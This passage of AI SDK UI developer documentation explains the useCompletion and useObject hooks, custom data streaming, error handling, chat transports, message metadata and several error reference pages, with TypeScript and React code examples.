// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { prompt }: { prompt: string } = await req.json();
const result = streamText({
model: __MODEL__,
prompt,
});
return result.toUIMessageStreamResponse();
}
In the Page component, the useCompletion hook will send a request to your AI provider endpoint whenever the user submits a message. The completion is then streamed back in real-time and displayed in the UI.
This enables a seamless text completion experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.
Customized UI
useCompletion also provides ways to manage the prompt via code, show loading and error states, and update messages without being triggered by user interactions.
Loading and error states
To show a loading spinner while the completion is being generated, you can use the isLoading state returned by the useCompletion hook:
const { isLoading, ... } = useCompletion()
return(
<>
{isLoading ? <Spinner /> : null}
</>
)
Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or show a toast notification:
const { error, ... } = useCompletion()
useEffect(() => {
if (error) {
toast.error(error.message)
}
}, [error])
// Or display the error message in the UI:
return (
<>
{error ? <div>{error.message}</div> : null}
</>
)
Controlled input
In the initial example, we have handleSubmit and handleInputChange callbacks that manage the input changes and form submissions. These are handy for common use cases, but you can also take more direct control for advanced scenarios such as form validation or customized components.
The following example demonstrates how to use more granular APIs like setInput with your custom input and submit button components:
const { input, setInput } = useCompletion();
return (
<>
<MyCustomInput value={input} onChange={value => setInput(value)} />
</>
);
Cancellation
It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useCompletion hook.
const { stop, isLoading, ... } = useCompletion()
return (
<>
<button onClick={stop} disabled={!isLoading}>Stop</button>
</>
)
When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your application.
Throttling UI Updates
This feature is currently only available for React.
By default, the useCompletion hook will trigger a render every time a new chunk is received.
You can throttle the UI updates with the experimental_throttle option.
const { completion, ... } = useCompletion({
// Throttle the completion and data updates to 50ms:
experimental_throttle: 50
})
Event Callbacks
useCompletion also provides optional event callbacks that you can use to handle different stages of the completion lifecycle. These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.
const { ... } = useCompletion({
onFinish: (prompt: string, completion: string) => {
console.log('Finished streaming completion:', completion)
},
onError: (error: Error) => {
console.error('An error occurred:', error)
},
})
Configure Request Options
By default, the useCompletion hook sends a HTTP POST request to the /api/completion endpoint with the prompt as part of the request body. You can customize the request by passing additional options to the useCompletion hook:
const { completion, input, handleInputChange, handleSubmit } = useCompletion({
api: '/api/custom-completion',
headers: {
Authorization: 'your_token',
},
body: {
user_id: '123',
},
credentials: 'same-origin',
});
In this example, the useCompletion hook sends a POST request to the /api/custom-completion endpoint with the specified headers, additional body fields, and credentials for that fetch request. On the server side, you can handle the request with this additional information.
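For instance, a corresponding server route might read the extra body field like this (a sketch; the user_id field matches the client example above):
import { streamText } from 'ai';
__PROVIDER_IMPORT__;

export async function POST(req: Request) {
  const { prompt, user_id }: { prompt: string; user_id: string } =
    await req.json();

  // Use the additional body field, e.g. for logging or per-user limits:
  console.log('Completion requested by user:', user_id);

  const result = streamText({
    model: __MODEL__,
    prompt,
  });

  return result.toUIMessageStreamResponse();
}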
title: Object Generation description: Learn how to use the useObject hook.
Object Generation
The useObject hook allows you to create interfaces that represent a structured JSON object that is being streamed.
In this guide, you will learn how to use the useObject hook in your application to generate UIs for structured data on the fly.
Example
The example shows a small notifications demo app that generates fake notifications in real-time.
Schema
It is helpful to set up the schema in a separate file that is imported on both the client and server.
import { z } from 'zod';
// define a schema for the notifications
export const notificationSchema = z.object({
notifications: z.array(
z.object({
name: z.string().describe('Name of a fictional person.'),
message: z.string().describe('Message. Do not use emojis or links.'),
}),
),
});
Client
The client uses useObject to stream the object generation process.
The results are partial and are displayed as they are received.
Please note the code for handling undefined values in the JSX.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Server
On the server, we use streamText with Output.object() to stream the object generation process.
import { streamText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { notificationSchema } from './schema';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const context = await req.json();
const result = streamText({
model: __MODEL__,
output: Output.object({ schema: notificationSchema }),
prompt:
`Generate 3 notifications for a messages app in this context:` + context,
});
return result.toTextStreamResponse();
}
Enum Output Mode
When you need to classify or categorize input into predefined options, you can use the enum output mode with useObject. This requires a specific schema structure where the object has enum as a key with z.enum containing your possible values.
Example: Text Classification
This example shows how to build a simple text classifier that categorizes statements as true or false.
Client
When using useObject with enum output mode, your schema must be an object with enum as the key:
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { z } from 'zod';
export default function ClassifyPage() {
const { object, submit, isLoading } = useObject({
api: '/api/classify',
schema: z.object({ enum: z.enum(['true', 'false']) }),
});
return (
<>
<button onClick={() => submit('The earth is flat')} disabled={isLoading}>
Classify statement
</button>
{object && <div>Classification: {object.enum}</div>}
</>
);
}
Server
On the server, use streamText with Output.choice() to stream the classification result:
import { streamText, Output } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(req: Request) {
const context = await req.json();
const result = streamText({
model: __MODEL__,
output: Output.choice({ options: ['true', 'false'] }),
prompt: `Classify this statement as true or false: ${context}`,
});
return result.toTextStreamResponse();
}
Customized UI
useObject also provides ways to show loading and error states:
Loading State
The isLoading state returned by the useObject hook can be used for several
purposes:
- To show a loading spinner while the object is generated.
- To disable the submit button.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
export default function Page() {
const { isLoading, object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
{isLoading && <Spinner />}
<button
onClick={() => submit('Messages during finals week.')}
disabled={isLoading}
>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Stop Handler
The stop function can be used to stop the object generation process. This can be useful if the user wants to cancel the request or if the server is taking too long to respond.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
export default function Page() {
const { isLoading, stop, object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
{isLoading && (
<button type="button" onClick={() => stop()}>
Stop
</button>
)}
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Error State
Similarly, the error state reflects the error object thrown during the fetch request.
It can be used to display an error message, or to disable the submit button:
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
export default function Page() {
const { error, object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
{error && <div>An error occurred.</div>}
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Event Callbacks
useObject provides optional event callbacks that you can use to handle life-cycle events.
- onFinish: Called when the object generation is completed.
- onError: Called when an error occurs during the fetch request.
These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
onFinish({ object, error }) {
// typed object, undefined if schema validation fails:
console.log('Object generation completed:', object);
// error, undefined if schema validation succeeds:
console.log('Schema validation error:', error);
},
onError(error) {
// error during fetch request:
console.error('An error occurred:', error);
},
});
return (
<div>
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</div>
);
}
Configure Request Options
You can configure the API endpoint, optional headers and credentials using the api, headers and credentials settings.
const { submit, object } = useObject({
api: '/api/use-object',
headers: {
'X-Custom-Header': 'CustomValue',
},
credentials: 'include',
schema: yourSchema,
});
title: Streaming Custom Data description: Learn how to stream custom data from the server to the client.
Streaming Custom Data
It is often useful to send additional data alongside the model's response. For example, you may want to send status information, the message ids after storing them, or references to content that the language model is referring to.
The AI SDK provides several helpers that allow you to stream additional data to the client
and attach it to the UIMessage parts array:
- createUIMessageStream: creates a data stream
- createUIMessageStreamResponse: creates a response object that streams data
- pipeUIMessageStreamToResponse: pipes a data stream to a server response object
The data is streamed as part of the response stream using Server-Sent Events.
Setting Up Type-Safe Data Streaming
First, define your custom message type with data part schemas for type safety:
import { UIMessage } from 'ai';
// Define your custom message type with data part schemas
export type MyUIMessage = UIMessage<
never, // metadata type
{
weather: {
city: string;
weather?: string;
status: 'loading' | 'success';
};
notification: {
message: string;
level: 'info' | 'warning' | 'error';
};
} // data parts type
>;
Streaming Data from the Server
In your server-side route handler, you can create a UIMessageStream and then pass it to createUIMessageStreamResponse:
import {
createUIMessageStream,
createUIMessageStreamResponse,
streamText,
convertToModelMessages,
} from 'ai';
__PROVIDER_IMPORT__;
import type { MyUIMessage } from '@/ai/types';
export async function POST(req: Request) {
const { messages } = await req.json();
const stream = createUIMessageStream<MyUIMessage>({
execute: async ({ writer }) => {
// 1. Send initial status (transient - won't be added to message history)
writer.write({
type: 'data-notification',
data: { message: 'Processing your request...', level: 'info' },
transient: true, // This part won't be added to message history
});
// 2. Send sources (useful for RAG use cases)
writer.write({
type: 'source',
value: {
type: 'source',
sourceType: 'url',
id: 'source-1',
url: 'https://weather.com',
title: 'Weather Data Source',
},
});
// 3. Send data parts with loading state
writer.write({
type: 'data-weather',
id: 'weather-1',
data: { city: 'San Francisco', status: 'loading' },
});
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
onFinish() {
// 4. Update the same data part (reconciliation)
writer.write({
type: 'data-weather',
id: 'weather-1', // Same ID = update existing part
data: {
city: 'San Francisco',
weather: 'sunny',
status: 'success',
},
});
// 5. Send completion notification (transient)
writer.write({
type: 'data-notification',
data: { message: 'Request completed', level: 'info' },
transient: true, // Won't be added to message history
});
},
});
writer.merge(result.toUIMessageStream());
},
});
return createUIMessageStreamResponse({ stream });
}
Types of Streamable Data
Data Parts (Persistent)
Regular data parts are added to the message history and appear in message.parts:
writer.write({
type: 'data-weather',
id: 'weather-1', // Optional: enables reconciliation
data: { city: 'San Francisco', status: 'loading' },
});
Sources
Sources are useful for RAG implementations where you want to show which documents or URLs were referenced:
writer.write({
type: 'source',
value: {
type: 'source',
sourceType: 'url',
id: 'source-1',
url: 'https://example.com',
title: 'Example Source',
},
});
Transient Data Parts (Ephemeral)
Transient parts are sent to the client but not added to the message history. They are only accessible via the onData handler of useChat:
// server
writer.write({
type: 'data-notification',
data: { message: 'Processing...', level: 'info' },
transient: true, // Won't be added to message history
});
// client
const [notification, setNotification] = useState();
const { messages } = useChat({
onData: ({ data, type }) => {
if (type === 'data-notification') {
setNotification({ message: data.message, level: data.level });
}
},
});
Data Part Reconciliation
When you write to a data part with the same ID, the client automatically reconciles and updates that part. This enables powerful dynamic experiences like:
- Collaborative artifacts - Update code, documents, or designs in real-time
- Progressive data loading - Show loading states that transform into final results
- Live status updates - Update progress bars, counters, or status indicators
- Interactive components - Build UI elements that evolve based on user interaction
The reconciliation happens automatically - simply use the same id when writing to the stream.
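For example, successive writes with the same id render as a single part that updates in place (data-progress is an illustrative part type, assuming you have declared it in your data part schemas):
for (let pct = 0; pct <= 100; pct += 25) {
  writer.write({
    type: 'data-progress', // hypothetical data part type
    id: 'progress-1', // same ID on every write = client updates in place
    data: { pct },
  });
}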
Processing Data on the Client
Using the onData Callback
The onData callback is essential for handling streaming data, especially transient parts:
import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from '@/ai/types';
const { messages } = useChat<MyUIMessage>({
api: '/api/chat',
onData: dataPart => {
// Handle all data parts as they arrive (including transient parts)
console.log('Received data part:', dataPart);
// Handle different data part types
if (dataPart.type === 'data-weather') {
console.log('Weather update:', dataPart.data);
}
// Handle transient notifications (ONLY available here, not in message.parts)
if (dataPart.type === 'data-notification') {
showToast(dataPart.data.message, dataPart.data.level);
}
},
});
Important: Transient data parts are only available through the onData callback. They will not appear in the message.parts array since they're not added to message history.
Rendering Persistent Data Parts
You can filter and render data parts from the message parts array:
const result = (
<>
{messages?.map(message => (
<div key={message.id}>
{/* Render weather data parts */}
{message.parts
.filter(part => part.type === 'data-weather')
.map((part, index) => (
<div key={index} className="weather-widget">
{part.data.status === 'loading' ? (
<>Getting weather for {part.data.city}...</>
) : (
<>
Weather in {part.data.city}: {part.data.weather}
</>
)}
</div>
))}
{/* Render text content */}
{message.parts
.filter(part => part.type === 'text')
.map((part, index) => (
<div key={index}>{part.text}</div>
))}
{/* Render sources */}
{message.parts
.filter(part => part.type === 'source')
.map((part, index) => (
<div key={index} className="source">
Source: <a href={part.url}>{part.title}</a>
</div>
))}
</div>
))}
</>
);
Complete Example
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import type { MyUIMessage } from '@/ai/types';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat<MyUIMessage>({
api: '/api/chat',
onData: dataPart => {
// Handle transient notifications
if (dataPart.type === 'data-notification') {
console.log('Notification:', dataPart.data.message);
}
},
});
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<>
{messages?.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{/* Render weather data */}
{message.parts
.filter(part => part.type === 'data-weather')
.map((part, index) => (
<span key={index} className="weather-update">
{part.data.status === 'loading' ? (
<>Getting weather for {part.data.city}...</>
) : (
<>
Weather in {part.data.city}: {part.data.weather}
</>
)}
</span>
))}
{/* Render text content */}
{message.parts
.filter(part => part.type === 'text')
.map((part, index) => (
<div key={index}>{part.text}</div>
))}
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
placeholder="Ask about the weather..."
/>
<button type="submit">Send</button>
</form>
</>
);
}
Use Cases
- RAG Applications - Stream sources and retrieved documents
- Real-time Status - Show loading states and progress updates
- Collaborative Tools - Stream live updates to shared artifacts
- Analytics - Send usage data without cluttering message history
- Notifications - Display temporary alerts and status messages
Message Metadata vs Data Parts
Both message metadata and data parts allow you to send additional information alongside messages, but they serve different purposes:
Message Metadata
Message metadata is best for message-level information that describes the message as a whole:
- Attached at the message level via message.metadata
- Sent using the messageMetadata callback in toUIMessageStreamResponse
- Ideal for: timestamps, model info, token usage, user context
- Type-safe with custom metadata types
// Server: Send metadata about the message
return result.toUIMessageStreamResponse({
messageMetadata: ({ part }) => {
if (part.type === 'finish') {
return {
model: part.response.modelId,
totalTokens: part.totalUsage.totalTokens,
createdAt: Date.now(),
};
}
},
});
Data Parts
Data parts are best for streaming dynamic arbitrary data:
- Added to the message parts array via message.parts
- Streamed using createUIMessageStream and writer.write()
- Can be reconciled/updated using the same ID
- Support transient parts that don't persist
- Ideal for: dynamic content, loading states, interactive components
// Server: Stream data as part of message content
writer.write({
type: 'data-weather',
id: 'weather-1',
data: { city: 'San Francisco', status: 'loading' },
});
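You can also combine both in one custom message type. Here is a sketch that merges the shapes from the snippets above (the metadata field names are illustrative):
import { UIMessage } from 'ai';

// Message-level metadata plus streamed data parts in one type.
type MyMetadata = {
  model: string;
  totalTokens: number;
  createdAt: number;
};

export type MyUIMessage = UIMessage<
  MyMetadata, // metadata type
  {
    weather: {
      city: string;
      weather?: string;
      status: 'loading' | 'success';
    };
  } // data parts type
>;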
For more details on message metadata, see the Message Metadata documentation.
title: Error Handling description: Learn how to handle errors in the AI SDK UI
Error Handling and Warnings
Warnings
The AI SDK shows warnings when something might not work as expected. These warnings help you fix problems before they cause errors.
When Warnings Appear
Warnings are shown in the browser console when:
- Unsupported features: You use a feature or setting that is not supported by the AI model (e.g., certain options or parameters).
- Compatibility warnings: A feature is used in a compatibility mode, which might work differently or less optimally than intended.
- Other warnings: The AI model reports another type of issue, such as general problems or advisory messages.
Warning Messages
All warnings start with "AI SDK Warning:" so you can easily find them. For example:
AI SDK Warning: The feature "temperature" is not supported by this model
Turning Off Warnings
By default, warnings are shown in the console. You can control this behavior:
Turn Off All Warnings
Set a global variable to turn off warnings completely:
globalThis.AI_SDK_LOG_WARNINGS = false;
Custom Warning Handler
You can also provide your own function to handle warnings. It receives provider id, model id, and a list of warnings.
globalThis.AI_SDK_LOG_WARNINGS = ({ warnings, provider, model }) => {
// Handle warnings your own way
};
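For example, a handler that forwards warnings to your own logging setup might look like this (myLogger is a hypothetical logger, not part of the SDK):
globalThis.AI_SDK_LOG_WARNINGS = ({ warnings, provider, model }) => {
  for (const warning of warnings) {
    // Forward each warning to your own logging infrastructure:
    myLogger.warn(`[${provider}/${model}] AI SDK warning`, warning);
  }
};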
Error Handling
Error Helper Object
Each AI SDK UI hook also returns an error object that you can use to render the error in your UI. You can use the error object to show an error message, disable the submit button, or show a retry button.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage, error, regenerate } = useChat();
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}:{' '}
{m.parts
.filter(part => part.type === 'text')
.map(part => part.text)
.join('')}
</div>
))}
{error && (
<>
<div>An error occurred.</div>
<button type="button" onClick={() => regenerate()}>
Retry
</button>
</>
)}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
disabled={error != null}
/>
</form>
</div>
);
}
Alternative: replace last message
Alternatively you can write a custom submit handler that replaces the last message when an error is present.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { sendMessage, error, messages, setMessages } = useChat();
function customSubmit(event: React.FormEvent<HTMLFormElement>) {
event.preventDefault();
if (error != null) {
setMessages(messages.slice(0, -1)); // remove last message
}
sendMessage({ text: input });
setInput('');
}
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role}:{' '}
{m.parts
.filter(part => part.type === 'text')
.map(part => part.text)
.join('')}
</div>
))}
{error && <div>An error occurred.</div>}
<form onSubmit={customSubmit}>
<input value={input} onChange={e => setInput(e.target.value)} />
</form>
</div>
);
}
Error Handling Callback
Errors can be processed by passing an onError callback function as an option to the useChat or useCompletion hooks.
The callback function receives an error object as an argument.
import { useChat } from '@ai-sdk/react';
export default function Page() {
const {
/* ... */
} = useChat({
// handle error:
onError: error => {
console.error(error);
},
});
}
Injecting Errors for Testing
You might want to create errors for testing. You can easily do so by throwing an error in your route handler:
export async function POST(req: Request) {
throw new Error('This is a test error');
}
title: Transport description: Learn how to use custom transports with useChat.
Transport
The useChat transport system provides fine-grained control over how messages are sent to your API endpoints and how responses are processed. This is particularly useful for alternative communication protocols like WebSockets, custom authentication patterns, or specialized backend integrations.
Default Transport
By default, useChat uses HTTP POST requests to send messages to /api/chat:
import { useChat } from '@ai-sdk/react';
// Uses default HTTP transport
const { messages, sendMessage } = useChat();
This is equivalent to:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
Custom Transport Configuration
Configure the default transport with custom options:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/custom-chat',
headers: {
Authorization: 'Bearer your-token',
'X-API-Version': '2024-01',
},
credentials: 'include',
}),
});
Dynamic Configuration
You can also provide functions that return configuration values. This is useful for authentication tokens that need to be refreshed, or for configuration that depends on runtime conditions:
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
headers: () => ({
Authorization: `Bearer ${getAuthToken()}`,
'X-User-ID': getCurrentUserId(),
}),
body: () => ({
sessionId: getCurrentSessionId(),
preferences: getUserPreferences(),
}),
credentials: () => 'include',
}),
});
Request Transformation
Transform requests before sending to your API:
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
prepareSendMessagesRequest: ({ id, messages, trigger, messageId }) => {
return {
headers: {
'X-Session-ID': id,
},
body: {
messages: messages.slice(-10), // Only send last 10 messages
trigger,
messageId,
},
};
},
}),
});
Direct Agent Transport
For scenarios where you want to communicate directly with an Agent without going through HTTP, you can use DirectChatTransport. This transport invokes the agent's stream() method directly in-process.
This is useful for:
- Server-side rendering: Run the agent on the server without an API endpoint
- Testing: Test chat functionality without network requests
- Single-process applications: Desktop or CLI apps where client and agent run together
import { useChat } from '@ai-sdk/react';
import { DirectChatTransport, ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
instructions: 'You are a helpful assistant.',
tools: {
weather: weatherTool,
},
});
const { messages, sendMessage } = useChat({
transport: new DirectChatTransport({ agent }),
});
How It Works
Unlike DefaultChatTransport which sends HTTP requests:
- DirectChatTransport validates incoming UI messages
- Converts them to model messages using convertToModelMessages
- Calls the agent's stream() method directly
- Returns the result as a UI message stream via toUIMessageStream()
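Conceptually, each send performs the steps above in-process. The following is a minimal sketch of that flow, not the actual implementation; the exact stream() call signature may differ, and agent and uiMessages stand in for the ToolLoopAgent and message list from the example above:
import { convertToModelMessages, type UIMessage } from 'ai';
// Conceptual sketch of one send: `agent` is the agent instance,
// `uiMessages` is the chat's current message list.
async function sendDirect(agent: any, uiMessages: UIMessage[]) {
  // 1.-2. validate the UI messages and convert them to model messages
  const modelMessages = await convertToModelMessages(uiMessages);
  // 3. call the agent's stream() method directly, no HTTP involved
  const result = agent.stream({ messages: modelMessages });
  // 4. expose the result to useChat as a UI message stream
  return result.toUIMessageStream();
}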
Configuration Options
You can pass additional options to customize the stream output:
const transport = new DirectChatTransport({
agent,
// Pass options to the agent
options: { customOption: 'value' },
// Configure what's sent to the client
sendReasoning: true,
sendSources: true,
});
For complete API details, see the DirectChatTransport reference.
Building Custom Transports
To understand how to build your own transport, refer to the source code of the default implementation:
- DefaultChatTransport - The complete default HTTP transport implementation
- HttpChatTransport - Base HTTP transport with request handling
- ChatTransport Interface - The transport interface you need to implement
These implementations show you exactly how to:
- Handle the sendMessages method
- Process UI message streams
- Transform requests and responses
- Handle errors and connection management
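As a rough starting point, a custom transport skeleton might look like this (a minimal sketch assuming the ChatTransport interface shape linked above; see the ChatTransport reference for the exact option fields):
import type { ChatTransport, UIMessage, UIMessageChunk } from 'ai';
class MyCustomTransport<MESSAGE extends UIMessage>
  implements ChatTransport<MESSAGE> {
  // Send the current messages over your own protocol (WebSocket, IPC, ...)
  // and return a stream of UIMessageChunk objects parsed from the replies.
  async sendMessages(
    options: Parameters<ChatTransport<MESSAGE>['sendMessages']>[0],
  ): Promise<ReadableStream<UIMessageChunk>> {
    throw new Error('not implemented in this sketch');
  }
  // Return null if your protocol does not support resuming streams.
  async reconnectToStream(
    options: Parameters<ChatTransport<MESSAGE>['reconnectToStream']>[0],
  ): Promise<ReadableStream<UIMessageChunk> | null> {
    return null;
  }
}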
The transport system gives you complete control over how your chat application communicates, enabling integration with any backend protocol or service.
title: Reading UIMessage Streams description: Learn how to read UIMessage streams.
Reading UI Message Streams
UIMessage streams are useful outside of traditional chat use cases. You can consume them for terminal UIs, custom stream processing on the client, or React Server Components (RSC).
The readUIMessageStream helper transforms a stream of UIMessageChunk objects into an AsyncIterableStream of UIMessage objects, allowing you to process messages as they're being constructed.
Basic Usage
import { readUIMessageStream, streamText } from 'ai';
__PROVIDER_IMPORT__;
async function main() {
const result = streamText({
model: __MODEL__,
prompt: 'Write a short story about a robot.',
});
for await (const uiMessage of readUIMessageStream({
stream: result.toUIMessageStream(),
})) {
console.log('Current message state:', uiMessage);
}
}
Tool Calls Integration
Handle streaming responses that include tool calls:
import { readUIMessageStream, streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function handleToolCalls() {
const result = streamText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
prompt: 'What is the weather in Tokyo?',
});
for await (const uiMessage of readUIMessageStream({
stream: result.toUIMessageStream(),
})) {
// Handle different part types
uiMessage.parts.forEach(part => {
switch (part.type) {
case 'text':
console.log('Text:', part.text);
break;
case 'tool-call':
console.log('Tool called:', part.toolName, 'with args:', part.args);
break;
case 'tool-result':
console.log('Tool result:', part.result);
break;
}
});
}
}
Resuming Conversations
Resume streaming from a previous message state:
import { readUIMessageStream, streamText, type UIMessage } from 'ai';
__PROVIDER_IMPORT__;
async function resumeConversation(lastMessage: UIMessage) {
const result = streamText({
model: __MODEL__,
messages: [
{ role: 'user', content: 'Continue our previous conversation.' },
],
});
// Resume from the last message
for await (const uiMessage of readUIMessageStream({
stream: result.toUIMessageStream(),
message: lastMessage, // Resume from this message
})) {
console.log('Resumed message:', uiMessage);
}
}
title: Message Metadata description: Learn how to attach and use metadata with messages in AI SDK UI
Message Metadata
Message metadata allows you to attach custom information to messages at the message level. This is useful for tracking timestamps, model information, token usage, user context, and other message-level data.
Overview
Message metadata differs from data parts in that it's attached at the message level rather than being part of the message content. While data parts are ideal for dynamic content that forms part of the message, metadata is perfect for information about the message itself.
Getting Started
Here's a simple example of using message metadata to track timestamps and model information:
Defining Metadata Types
First, define your metadata type for type safety:
import { UIMessage } from 'ai';
import { z } from 'zod';
// Define your metadata schema
export const messageMetadataSchema = z.object({
createdAt: z.number().optional(),
model: z.string().optional(),
totalTokens: z.number().optional(),
});
export type MessageMetadata = z.infer<typeof messageMetadataSchema>;
// Create a typed UIMessage
export type MyUIMessage = UIMessage<MessageMetadata>;
Sending Metadata from the Server
Use the messageMetadata callback in toUIMessageStreamResponse to send metadata at different streaming stages:
import { convertToModelMessages, streamText } from 'ai';
__PROVIDER_IMPORT__;
import type { MyUIMessage } from '@/types';
export async function POST(req: Request) {
const { messages }: { messages: MyUIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
originalMessages: messages, // pass this in for type-safe return objects
messageMetadata: ({ part }) => {
// Send metadata when streaming starts
if (part.type === 'start') {
return {
createdAt: Date.now(),
model: 'your-model-id',
};
}
// Send additional metadata when streaming completes
if (part.type === 'finish') {
return {
totalTokens: part.totalUsage.totalTokens,
};
}
},
});
}
Accessing Metadata on the Client
Access metadata through the message.metadata property:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import type { MyUIMessage } from '@/types';
export default function Chat() {
const { messages } = useChat<MyUIMessage>({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.metadata?.createdAt && (
<span className="text-sm text-gray-500">
{new Date(message.metadata.createdAt).toLocaleTimeString()}
</span>
)}
</div>
{/* Render message content */}
{message.parts.map((part, index) =>
part.type === 'text' ? <div key={index}>{part.text}</div> : null,
)}
{/* Display additional metadata */}
{message.metadata?.totalTokens && (
<div className="text-xs text-gray-400">
{message.metadata.totalTokens} tokens
</div>
)}
</div>
))}
</div>
);
}
Common Use Cases
Message metadata is ideal for:
- Timestamps: When messages were created or completed
- Model Information: Which AI model was used
- Token Usage: Track costs and usage limits
- User Context: User IDs, session information
- Performance Metrics: Generation time, time to first token
- Quality Indicators: Finish reason, confidence scores
See Also
- Chatbot Guide - Message metadata in the context of building chatbots
- Streaming Data - Comparison with data parts
- UIMessage Reference - Complete UIMessage type reference
title: AI_APICallError description: Learn how to fix AI_APICallError
AI_APICallError
This error occurs when an API call fails.
Properties
- url: The URL of the API request that failed
- requestBodyValues: The request body values sent to the API
- statusCode: The HTTP status code returned by the API (optional)
- responseHeaders: The response headers returned by the API (optional)
- responseBody: The response body returned by the API (optional)
- isRetryable: Whether the request can be retried based on the status code
- data: Any additional data associated with the error (optional)
- cause: The underlying error that caused the API call to fail (optional)
Checking for this Error
You can check if an error is an instance of AI_APICallError using:
import { APICallError } from 'ai';
if (APICallError.isInstance(error)) {
// Handle the error
}
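Once the check passes, the documented properties are available for branching (a minimal sketch):
import { APICallError } from 'ai';
if (APICallError.isInstance(error)) {
  console.error('Call to', error.url, 'failed with status', error.statusCode);
  console.error('Response body:', error.responseBody);
  if (error.isRetryable) {
    // the status code indicates the request can be retried
  }
}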
title: AI_DownloadError description: Learn how to fix AI_DownloadError
AI_DownloadError
This error occurs when a download fails.
Properties
- url: The URL that failed to download
- statusCode: The HTTP status code returned by the server (optional)
- statusText: The HTTP status text returned by the server (optional)
- cause: The underlying error that caused the download to fail (optional)
- message: The error message containing details about the download failure (optional, auto-generated)
Checking for this Error
You can check if an error is an instance of AI_DownloadError using:
import { DownloadError } from 'ai';
if (DownloadError.isInstance(error)) {
// Handle the error
}
title: AI_EmptyResponseBodyError description: Learn how to fix AI_EmptyResponseBodyError
AI_EmptyResponseBodyError
This error occurs when the server returns an empty response body.
Properties
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_EmptyResponseBodyError using:
import { EmptyResponseBodyError } from 'ai';
if (EmptyResponseBodyError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidArgumentError description: Learn how to fix AI_InvalidArgumentError
AI_InvalidArgumentError
